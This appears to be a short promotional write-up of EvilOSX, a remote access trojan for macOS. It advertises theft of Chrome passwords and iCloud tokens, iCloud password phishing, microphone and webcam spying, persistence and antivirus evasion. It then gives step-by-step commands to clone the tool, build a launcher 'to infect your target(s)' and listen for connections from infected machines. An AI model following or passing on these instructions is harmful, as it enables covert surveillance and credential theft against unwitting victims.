EvilOSX is an Evil Remote Administration Tool For MacOS / OS X with the following features like Emulate a terminal instance, Simple extendable module system, No bot dependencies, Undetected by anti-virus, Persistent, GUI and CLI support, Retrieve Chrome passwords, Retrieve iCloud tokens and contacts, Retrieve/monitor the clipboard, Retrieve browser history, Phish for iCloud passwords via iTunes, iTunes (iOS) backup enumeration, Record the microphone, Take a desktop screenshot or picture using the webcam and Attempt to get root via local privilege escalation.
How To Use EvilOSX
- The server side requires python3 to run.
- The bot side is written in python2 which is already installed on macOS / OS X.
- Once python3 is installed, open a terminal and type the following:
# Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Install dependencies required by the server $ sudo pip3 install -r requirements.txt # Go into the repository $ cd EvilOSX # Start listening for connections $ python3 start.py # Lastly, run the built launcher (see the builder tab) on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
There is also a command line interface for those who want to use this over SSH:
# Create a launcher to infect your target(s) $ python3 builder.py # Start listening for connections $ python3 start.py --cli --port 1337 # Lastly, run the built launcher on your target(s)